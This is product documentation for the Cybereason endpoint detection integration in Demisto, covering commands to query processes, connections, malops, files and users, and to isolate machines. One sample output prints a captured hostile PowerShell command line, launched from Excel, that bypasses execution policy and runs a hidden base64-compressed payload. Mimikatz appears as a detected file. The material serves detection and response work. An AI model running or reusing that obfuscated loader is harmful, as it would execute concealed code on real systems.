Cybereason

Cybereason is an endpoint detection and response platform used through Demisto to manage and query malops, connections, and processes.


This integration was integrated and tested with Cybereason v17.5.20.

Important Notes

  1. The integration supports both basic and client-certification authentications.
  2. Decrypt certificate .pfx file outside of Demisto.
  3. If you plan to fetch incidents, read the important notes in the Fetched Incidents Data section.
  4. Insert the decrypted certificate in the Certificate field under the Credentials tab, according to the following template.
Bag Attributes
<ATTRIBUTES>
-----BEGIN CERTIFICATE-----
<CERTIFICATE>
-----END CERTIFICATE-----
-----BEGIN RSA PRIVATE KEY-----
<KEY>
-----END RSA PRIVATE KEY-----

Configure Cybereason on Demisto

  1. Navigate to Settings > Integrations > Servers & Services .
  2. Search for Cybereason.
  3. Click Add instance to create and configure a new integration instance.
    • Name : a textual name for the integration instance.
    • Server URL (e.g. https://192.168.0.1 )
    • Credentials
    • Trust any certificate (not secure)
    • Use system proxy settings
    • Fetch incidents
    • Incident type
  4. Click Test to validate the URLs, token, and connection.

Fetched Incidents Data

Demisto fetches the first batch of Cybereason malops from the previous three days.
After the first batch of fetched malops, Demisto fetches new Cybereason malops as soon as they are generated in Cybereason.

IMPORTANT : In order to properly fetch incidents, you need to set the pre-processing script to CybereasonPreProcessing for the incident type you configure in each integration instance. For example, if you select the Malware, you need to configure the pre-processing script for the Malware incident type to CybereasonPreProcessing .

Integration Instance Configuration

Cybereason_Fetched_Incidents_2.jpg

Malware Indicator Type Configuration

Cybereason_Fetched_Incidents_1.jpg

Commands

You can execute these commands from the Demisto CLI, as part of an automation, or in a playbook. After you successfully execute a command, a DBot message appears in the War Room with the command details.

  1. Search for processes: cybereason-query-processes
  2. Check connection to Cybereason server: cybereason-is-probe-connected
  3. Search for connections: cybereason-query-connections
  4. Isolate a machine from the network: cybereason-isolate-machine
  5. Take machine out of isolation: cybereason-unisolate-machine
  6. Get a list and details for all malops: cybereason-query-malops
  7. Get a list of all malops: cybereason-malop-processes
  8. Add a comment to a malop: cybereason-add-comment
  9. Update malop status: cybereason-update-malop-status
  10. Prevent a malop process file: cybereason-prevent-file
  11. Allow a malop process file: cybereason-unprevent-file
  12. Get information for a file: cybereason-query-file
  13. Get information for a domain: cybereason-query-domain
  14. Get information for a user: cybereason-query-user

1. Search for processes


Searches for processes with various filters.

Base Command

cybereason-query-processes

Input
Argument Name Description Required
machine Machine hostname Optional
onlySuspicious Show only suspicious processes Optional
limit Maximum number of results to retrieve Optional
processName Process name to filter by Optional
saveToContext If true, save the result to the context Optional
hasIncomingConnection Filter only processes with incoming connections Optional
hasOutgoingConnection Filter only processes with outgoing connections Optional

Context Output
Path Description
Process.Name The process name
Process.Malicious Malicious status of the process
Process.CreationTime Process creation time
Process.EndTime Process end time
Process.CommandLine Command line of the process
Process.SignedAndVerified Is the process signed and verified
Process.ProductType Product type
Process.Children Children of the process
Process.Parent Parent process
Process.OwnerMachine Machine hostname
Process.User The user who ran the process
Process.ImageFile Image file of the process
Process.SHA1 SHA-1 of the process file
Process.MD5 MD5 of the process file
Process.CompanyName Company name
Process.ProductName Product name

Command Example
!cybereason-query-processes machine=DESKTOP-VUO0QPN hasOutgoingConnection=true hasIncomingConnection=true
Context Example
{
    "Process": [
        {
            "CommandLine": "C:\\Windows\\system32\\svchost.exe -k LocalService",
            "CompanyName": "Microsoft Corporation",
            "CreationTime": "2018-08-06T23:46:30",
            "EndTime": "2018-08-06T23:45:11",
            "ImageFile": "svchost.exe",
            "MD5": "32569e403279b3fd2edb7ebd036273fa",
            "Malicious": "indifferent",
            "Name": "svchost.exe",
            "OwnerMachine": "DESKTOP-VUO0QPN",
            "Parent": "services.exe",
            "ProductName": "Microsoft® Windows® Operating System",
            "ProductType": "SVCHOST",
            "SHA1": "660b76b6fb802417d513adc967c5caf77fc2bac6",
            "SignedandVerified": "true",
            "User": "desktop-vuo0qpn\\local service"
        }
    ]
}
Human Readable Output

Cybereason Processes

Name Malicious Creation Time End Time Command Line Signed and Verified Product Type Children Parent Owner Machine User Image File SHA1 MD5 Company Name Product Name
svchost.exe indifferent 2018-08-06T23:46:30 2018-08-06T23:45:11 C:\Windows\system32\svchost.exe -k LocalService true SVCHOST services.exe DESKTOP-VUO0QPN desktop-vuo0qpn\local service svchost.exe 660b76b6fb802417d513adc967c5caf77fc2bac6 32569e403279b3fd2edb7ebd036273fa Microsoft Corporation Microsoft® Windows® Operating System

2. Check connection to Cybereason server


Checks if the machine is currently connected to the Cybereason server.

Base Command

cybereason-is-probe-connected

Input
Argument Name Description Required
machine Hostname of the machine to check Required

Context Output
Path Type Description
Cybereason.Machine.isConnected boolean true if machine is connected, false if machine is not connected
Cybereason.Machine.Name string Machine name

Command Example
!cybereason-is-probe-connected machine=DESKTOP-VUO0QPN
Context Example
{
    "Cybereason": {
      "Machine":
        "Name": "DESKTOP-VUO0QPN",
        "isConnected": true
      }
    }
}
Human Readable Output

true

3. Search for connections


Searches for connections.

Base Command

cybereason-query-connections

Input
Argument Name Description Required
ip Filter connections that contain this IP (in or out) Optional
machine Filter connections on the specified machine Optional
saveToContext If true , save the result to the context Optional

Context Output
Path Description
Connection.Name Connection name
Connection.Direction OUTGOING/INCOMING
Connection.ServerAddress Address of the Cybereason machine
Connection.ServerPort Port of the Cybereason machine
Connection.PortType Connection type
Connection.ReceivedBytes Received bytes count
Connection.TransmittedBytes Transmitted bytes count
Connection.RemoteCountry Connection's remote country
Connection.OwnerMachine Machine hostname
Connection.OwnerProcess The process that performed the connection
Connection.CreationTime Connection creation time
Connection.EndTime Connection end time

Command Example
!cybereason-query-connections ip=192.168.39.128
Context Example
{
    "Connection": [
        {
            "CreationTime": "2018-04-30T18:12:28",
            "Direction": "OUTGOING",
            "Name": "172.16.3.7:48300 \u003e 54.235.96.83:8443",
            "OwnerMachine": "ip-172-16-3-7.ec2.internal",
            "OwnerProcess": "cybereason-sens",
            "RemoteCountry": "United States",
            "ServerAddress": "54.235.96.83",
            "ServerPort": "8443"
        }
    ]
}
Human Readable Output

Cybereason Connections

Name Direction Server Address Server Port Port Type Received Bytes Transmitted Bytes Remote Country Owner Machine Owner Process Creation Time End Time
172.16.3.7:48300 > 54.235.96.83:8443 OUTGOING 54.235.96.83 8443 United States ip-172-16-3-7.ec2.internal cybereason-sens 2018-04-30T18:12:28

4. Isolate machine from the network


Isolates a machine that has been infected from the rest of the network

Base Command

cybereason-isolate-machine

Input
Argument Name Description Required
machine Machine name to be isolated Required

Context Output
Path Type Description
Cybereason.Machine string Machine name
Cybereason.IsIsolated boolean Is the machine isolated
Endpoint.Hostname string Machine name

Command Example
!cybereason-isolate-machine machine=DESKTOP-VUO0QPN
Context Example
{
    "Cybereason": {
        "IsIsolated": true,
        "Machine": "DESKTOP-VUO0QPN"
    },
    "Endpoint": {
        "Hostname": "DESKTOP-VUO0QPN"
    }
}
Human Readable Output

Machine was isolated successfully.

5. Take machine out of isolation


Returns a machine that was isolated from the network.

Base Command

cybereason-unisolate-machine

Input
Argument Name Description Required
machine Name of machine to take out of isolation Required

Context Output
Path Type Description
Cybereason.Machine string Machine name
Cybereason.IsIsolated boolean Is the machine isolated
Endpoint.Hostname string Machine name

Command Example
!cybereason-unisolate-machine machine=DESKTOP-VUO0QPN raw-response=true
Context Example
{
    "Cybereason": {
        "IsIsolated": false,
        "Machine": "DESKTOP-VUO0QPN"
    },
    "Endpoint": {
        "Hostname": "DESKTOP-VUO0QPN"
    }
}
Human Readable Output

Machine was un-isolated successfully.

6. Get a list and details for all malops


Returns a list and details of all malops.

Base Command

cybereason-query-malops

Input
Argument Name Description Required
filters The filters to filter the response by (given in Cybereason API syntax) Optional
totalResultLimit The total number of results to return for your server. To reduce system overload and maximize server performance, make sure the limit is a reasonable number. Optional
perGroupLimit The number of items to return for each malop group Optional
templateContext The level of detail to provide in the response. Possible values include:
  • SPECIFIC: References value contain only the count in the ElementValues class. The Suspicions map is calculated for each results, with the suspicion name and the first time the suspicion appeared. The Evidence map is not calculated for the results.
  • CUSTOM: Reference values contain the specific Elements, up to the limit defined in the perFeatureLimit parameter. The Suspicions map is not calculated for the results. The Evidence map is not calculated for the results.
  • DETAILS: Reference values contain the specific Elements, up to the limit defined in the perFeatureLimit parameter. The Suspicions map is calculated for each result, containing the suspicion name and the first time the suspicion appeared. The Evidence map is not calculated for the results.
Optional
withinLastDays Return all the malops within the last days Optional

Context Output
Path Type Description
Cybereason.Malops.GUID string Malop GUID
Cybereason.Malops.CreationTime string The time reported as when the malicious behavior began on the system. This is not the time the malop was first detected by Cybereason.
Cybereason.Malops.DecisionFeature string The reason that Cybereason raised the malop
Cybereason.Malops.Link string Link to the malop on Cybereason
Cybereason.Malops.Suspects string Malop suspect type and name
Cybereason.Malops.LastUpdatedTime string Last updated time of malop
Cybereason.Malops.AffectedMachine string List of machines affected by this malop
Cybereason.Malops.InvolvedHash string List of file hashes involved in this malop

Command Example
!cybereason-query-malops
Context Example
{
    "Cybereason": {
      "Malops" : [
        {
            "CreationTime": "2018-04-30T14:05:14",
            "DecisionFailure": "maliciousExecutionOfPowerShell",
            "GUID": "11.8371241992421952627",
            "LastUpdateTime": "2018-04-30T14:07:29",
            "Link": "https://integration.cybereason.net:8443/#/malop/11.8371241992421952627",
            "Suspects": "Process: powershell.exe"
        }
    ]
  }
}
Human Readable Output

Cybereason Malops

GUID Link CreationTime LastUpdateTime DecisionFailure Suspects
11.8371241992421952627 https://integration.cybereason.net:8443/#/malop/11.8371241992421952627 2018-04-30T14:05:14 2018-04-30T14:07:29 maliciousExecutionOfPowerShell Process: powershell.exe

7. Get a list of all malops


Returns a list of malops.

Base Command

cybereason-malop-processes

Input
Argument Name Description Required
malopGuids Array of malop GUIDs (comma-separated). Retrieve the Malop GUID using the cybereason-query-malops . Required
machinename A CSV list of machine names affected by malops, for example, "machine1,machine2" Optional

Context Output
Path Type Description
Process.Name string Process name
Process.Malicious unknown Malicious status of the process
Process.CreationTime date Process creation time
Process.EndTime date Process end time
Process.CommandLine string The command line of the process
Process.SignedAndVerified unknown Is the process signed and verified
Process.ProductType unknown Product type
Process.Children unknown Children of the process
Process.Parent unknown Parent process
Process.OwnerMachine unknown Machine hostname
Process.User string The user who ran the process
Process.ImageFile unknown Image file of the process
Process.SHA1 string SHA-1 of the process file
Process.MD5 string MD5 of the process file
Process.CompanyName string Company name
Process.ProductName string Product name

Command Example
!cybereason-malop-processes malopGuids=11.8371241992421952627
Context Example
{
    "Process": [
        {
            "CommandLine": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command \"Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('nVRtc9o4EP7Or9jx6GbsCVbMS2mCJzOl0LTcFZoLtOkdw9wIW2AXWXJkGUwo//3W4CP0632xvNLuPs+unhV5hjt4Z9VmAyGGSaq0sa0115KLVpOGQljOHNJ8IeIAMsMMLrwweA5DaR6Mhm+xNjkTPSFUYFd7Iu2FoeZZVoc8lgbC7SR+4ZWxPPliKiWnu/R1+0ErwwPj+P+bS19zZvg0wiV85XKye8boeJEbfkHKsGB9YnZ2xj1tzuzP2w9Ms4Qj1jn4iIUl3Au2uvQ8oQ1DLMN6VzN6tychdtjqve8PPtx//DT8/Y/Po/GXhz8fJ9Ov356+//U3WwQhX66i+MdaJFKlzzoz+WZb7F68RrPVftN5e3Nr0anqR0z3tGY726ktcxmU6BDYZOPsQXOTYx9se4bsZvM5kM2vEfATRpxluebul8UPbDO4kzxxKH7gN/CKhueBy5/htukcXrMb2JNlyd7yG5S2fi4VFhdErjqmwLOrOyDhzF5x42omQ5WAm7AiTjArCelnLlcmcuYHv+JHlv5Fdg57SLUKsNWwn7GS6JwUCIefKyD/HHzgMkQKBbLPUA0VLuxtybf/GY9HXIdK1ILtHA4XAKs9IGOwSXzn+SQGVxjotPHv6srZkwiRjE/WJWCICNwHqArEEAEx8l2jX1Y6RCUj4UO8BBt7njkOnLuOHghbGdbt5vtXC8skCcaNkWfV78kuMzyhY27oE1/0Rcwloif0E8qF64yi6Gwrz7h22QqPrDpYI/USC8Gu29RDVJWkqLiFQJ6jyfADdGjDh6cYq99mMJ46llMjEjFXPsze7ww/yiAtySd0oLZSKBYOmGG2FRmTdq+vG7dN2ujcUI82vJtuu926JtICzKIwCOm45XjihfJkwfWAL2MZH9tKnsEd4ziAheitpgWuRCtLWcDhuHNfXUAGbsqyzEQ6r5Hijqhu95fnwquTtBJJ3Stanufh0vYcf1Y16zGXJk44xeniWqUTrjcxyoWOmM4iJubdbl+lO5ukdfDqMDsN4dwmBYofjVbTdpw6nEHK0jDk8pVAxDop6uXilUOicuPKXOBNH18CdyI4T3FWeKBQijedtucd8O0Kov3hXw==')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();\"",
            "CompanyName": "Microsoft Corporation",
            "CreationTime": "2018-04-30T14:05:49",
            "EndTime": "2018-04-30T14:06:22",
            "ImageFile": "powershell.exe",
            "MD5": "92f44e405db16ac55d97e3bfe3b132fa",
            "Malicious": "indifferent",
            "Name": "powershell.exe",
            "OwnerMachine": "ROBERTE-EXCASST",
            "Parent": "excel.exe",
            "ProductName": "Microsoft® Windows® Operating System",
            "SHA1": "04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d",
            "User": "darkcap\\roberte"
        }
    ]
}
Human Readable Output

Cybereason Malop Processes

Name Malicious Creation Time End Time Command Line Parent Owner Machine User Image File SHA1 MD5 Company Name Product Name
powershell.exe indifferent 2018-04-30T14:05:49 2018-04-30T14:06:22 C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('nVRtc9o4EP7Or9jx6GbsCVbMS2mCJzOl0LTcFZoLtOkdw9wIW2AXWXJkGUwo//3W4CP0632xvNLuPs+unhV5hjt4Z9VmAyGGSaq0sa0115KLVpOGQljOHNJ8IeIAMsMMLrwweA5DaR6Mhm+xNjkTPSFUYFd7Iu2FoeZZVoc8lgbC7SR+4ZWxPPliKiWnu/R1+0ErwwPj+P+bS19zZvg0wiV85XKye8boeJEbfkHKsGB9YnZ2xj1tzuzP2w9Ms4Qj1jn4iIUl3Au2uvQ8oQ1DLMN6VzN6tychdtjqve8PPtx//DT8/Y/Po/GXhz8fJ9Ov356+//U3WwQhX66i+MdaJFKlzzoz+WZb7F68RrPVftN5e3Nr0anqR0z3tGY726ktcxmU6BDYZOPsQXOTYx9se4bsZvM5kM2vEfATRpxluebul8UPbDO4kzxxKH7gN/CKhueBy5/htukcXrMb2JNlyd7yG5S2fi4VFhdErjqmwLOrOyDhzF5x42omQ5WAm7AiTjArCelnLlcmcuYHv+JHlv5Fdg57SLUKsNWwn7GS6JwUCIefKyD/HHzgMkQKBbLPUA0VLuxtybf/GY9HXIdK1ILtHA4XAKs9IGOwSXzn+SQGVxjotPHv6srZkwiRjE/WJWCICNwHqArEEAEx8l2jX1Y6RCUj4UO8BBt7njkOnLuOHghbGdbt5vtXC8skCcaNkWfV78kuMzyhY27oE1/0Rcwloif0E8qF64yi6Gwrz7h22QqPrDpYI/USC8Gu29RDVJWkqLiFQJ6jyfADdGjDh6cYq99mMJ46llMjEjFXPsze7ww/yiAtySd0oLZSKBYOmGG2FRmTdq+vG7dN2ujcUI82vJtuu926JtICzKIwCOm45XjihfJkwfWAL2MZH9tKnsEd4ziAheitpgWuRCtLWcDhuHNfXUAGbsqyzEQ6r5Hijqhu95fnwquTtBJJ3Stanufh0vYcf1Y16zGXJk44xeniWqUTrjcxyoWOmM4iJubdbl+lO5ukdfDqMDsN4dwmBYofjVbTdpw6nEHK0jDk8pVAxDop6uXilUOicuPKXOBNH18CdyI4T3FWeKBQijedtucd8O0Kov3hXw==')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();" excel.exe ROBERTE-EXCASST darkcap\roberte powershell.exe 04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d 92f44e405db16ac55d97e3bfe3b132fa Microsoft Corporation Microsoft® Windows® Operating System

8. Add a comment to a malop


Adds a new comment to a malop.

Base Command

cybereason-add-comment

Input
Argument Name Description Required
comment Comment to add to the malop. Required
malopGuid GUID of the malop to add the comment to. Retrieve the Malop GUID using the cybereason-query-malops . Required

Context Output

There is no context output for this command.

Command Example
!cybereason-add-comment comment=NewComment malopGuid=11.8371241992421952627
Human Readable Output

Comment added successfully

9. Update malop status


Updates a malop status.

Base Command

cybereason-update-malop-status

Input
Argument Name Description Required
malopGuid GUID of the malop to update the status of Required
status Status to update Required

Context Output
Path Type Description
Cybereason.Malops.GUID string Malop GUID
Cybereason.Malops.Status string

Malop status:

  • To Review
  • Unread
  • Remediated
  • Not Relevant

Command Example
!cybereason-update-malop-status malopGuid=11.8371241992421952627 status="To Review"
Context Example
{
    "Cybereason": {
      "Malops":
        "GUID": "11.8371241992421952627",
        "Status": "To Review"
       }
    }
}
Human Readable Output

Successfully updated malop 11.8371241992421952627 to status To Review

10. Prevent a malop process file


Prevent malop process file from running on the machine.

Base Command

cybereason-prevent-file

Input
Argument Name Description Required
hash MD5 of the malop process file to prevent Required

Context Output
Path Type Description
Process.MD5 string Process file MD5
Process.Prevent boolean True if process file is prevented

Command Example
!cybereason-prevent-file hash=6fb065fcff8d92da51bba667dc9f770c
Context Example
{
  "Process": {
    "MD5": "6fb065fcff8d92da51bba667dc9f770c",
    "Prevent": true
  }
}
Human Readable Output

File was prevented successfully.

11. Allow a malop process file


Allow a malop process file to run on the machine.

Base Command

cybereason-unprevent-file

Input
Argument Name Description Required
hash MD5 of the malop process file to allow Required

Context Output
Path Type Description
Process.MD5 string Process file MD5
Process.Prevent boolean True if process file is prevented

Command Example
!cybereason-unprevent-file hash=6fb065fcff8d92da51bba667dc9f770c
Context Example
{
  "Process": {
    "MD5": "6fb065fcff8d92da51bba667dc9f770c",
    "Prevent": false
  }
}
Human Readable Output

File was unprevented successfully.

12. Get information for a file


Query files as part of investigation.

Base Command

cybereason-query-file

Input
Argument Name Description Required
file_hash File hash (SHA-1 and MD5 supported) Required

Context Output
Path Type Description
Cybereason.File.Path string File path
Cybereason.File.SHA1 string File SHA-1 hash
Cybereason.File.Machine string Machine name on which file is located
Cybereason.File.SuspicionsCount number File suspicions count
Cybereason.File.Name string File name
Cybereason.File.CreationTime date File creation time
Cybereason.File.Suspicion string File suspicions object of suspicion as key and detected date as value
Cybereason.File.OSVersion string Machine OS version on which the file is located
Cybereason.File.ModifiedTime date File modified date
Cybereason.File.Malicious boolean Is file malicious
Cybereason.File.Company string Company name
Cybereason.File.MD5 string File MD5 hash
Cybereason.File.IsConnected boolean Is machine connected to Cybereason
Cybereason.File.Signed boolean Is file signed
Cybereason.File.Evidence string File evidences
Endpoint.Hostname string Hostname on which file is located
Endpoint.OSVersion string Machine OS version on which the file is located
File.Hostname string Hostname on which file is located
File.MD5 string File MD5 hash
File.SHA1 string File SHA-1 hash
File.Name string File name
File.Path string File path

Command Example
!cybereason-query-file file_hash=d40a48094c1f21fef892f27a8b6a7ed2bbf0c27f
Context Example
{
    "Cybereason": {
        "File": [
        {
            "Company": "company",
            "CreationTime": "2018-09-25T20:10:38.000Z",
            "Evidence": [
                "mimikatzResourceEvidence",
                "reportedByAntiMalwareEvidence",
                "malwareClassificationEvidence",
                "hasLegitClassificationEvidence",
                "hasNonLegitClassificationEvidence",
                "whitelistClassificationEvidence"
            ],
            "IsConnected": false,
            "MD5": "b5962945811f8d275a3a69334dbc81e8",
            "Machine": "DESKTOP-UNQ8LCD",
            "Malicious": false,
            "ModifiedTime": "2018-11-14T20:02:34.000Z",
            "Name": "mimikatz.exe",
            "OSVersion": "Windows_10",
            "Path": "c:\\users\\user\\downloads\\mimikatz_trunk\\x64\\mimikatz.exe",
            "SHA1": "d40a48094c1f21fef892f27a8b6a7ed2bbf0c27f",
            "Signed": true,
            "Suspicion": {
                "fileReputationSuspicion": "2018-11-14T20:02:52.000Z",
                "mimikatzSuspicion": "2018-11-14T20:02:52.000Z",
                "reportedByAntiMalwareSuspicion": "2018-11-27T20:56:54.000Z"
            },
            "SuspicionsCount": 3
        }
    ]
    },
    "Endpoint": [
        {
            "Hostname": "DESKTOP-UNQ8LCD",
            "OSVersion": "Windows_10"
        }
    ],
    "File": [
        {
            "Hostname": "DESKTOP-UNQ8LCD",
            "MD5": "b5962945811f8d275a3a69334dbc81e8",
            "Name": "mimikatz.exe",
            "Path": "c:\\users\\user\\downloads\\mimikatz_trunk\\x64\\mimikatz.exe",
            "SHA1": "d40a48094c1f21fef892f27a8b6a7ed2bbf0c27f"
        }
    ]
}
Human Readable Output

image

13. Get information for a domain


Query domains as part of investigation.

Base Command

cybereason-query-domain

Input
Argument Name Description Required
domain Domain to query Required

Context Output
Path Type Description
Cybereason.Domain.Name string Domain name
Cybereason.Domain.Malicious boolean Is domain malicious
Cybereason.Domain.IsInternalDomain boolean Is domain internal
Cybereason.Domain.Reputation string Domain reputation
Cybereason.Domain.SuspicionsCount number Domain suspicions count
Cybereason.Domain.WasEverResolved boolean Was domain ever resolved
Cybereason.Domain.WasEverResolvedAsASecondLevelDomain boolean Was domain ever resolved as a second-level domain
Domain.Name string Domain name

Command Example
!cybereason-query-domain domain=www2.bing.com
Context Example
{
    "Cybereason": {
     "Domain": [
        {
            "IsInternalDomain": false,
            "Malicious": false,
            "Name": "www2.bing.com",
            "Reputation": "indifferent",
            "SuspicionsCount": 0,
            "WasEverResolved": true,
            "WasEverResolvedAsASecondLevelDomain": true
        }
    ],
    "Domain": [
        {
            "Name": "www2.bing.com"
        }
    ]
  }
}
Human Readable Output

image

14. Get information for a user


Query users as part of investigation.

Base Command

cybereason-query-user

Input
Argument Name Description Required
username Username to query Required

Context Output
Path Type Description
Cybereason.User.Username string User name
Cybereason.User.Domain string User domain
Cybereason.User.LastMachineLoggedInTo string Last machine the user logged in to
Cybereason.User.LocalSystem boolean Is local system
Cybereason.User.Organization string User organization

Command Example
!cybereason-query-user username="ec2amaz-5man2hc\\network service"
Context Example
{
    "Cybereason": {
     "User": [
        {
            "Domain": "ec2amaz-5man2hc",
            "LastMachineLoggedInTo": "EC2AMAZ-5MAN2HC",
            "LocalSystem": true,
            "Organization": "INTEGRATION",
            "Username": "ec2amaz-5man2hc\\network service"
        }
    ]
  }
}
Human Readable Output

image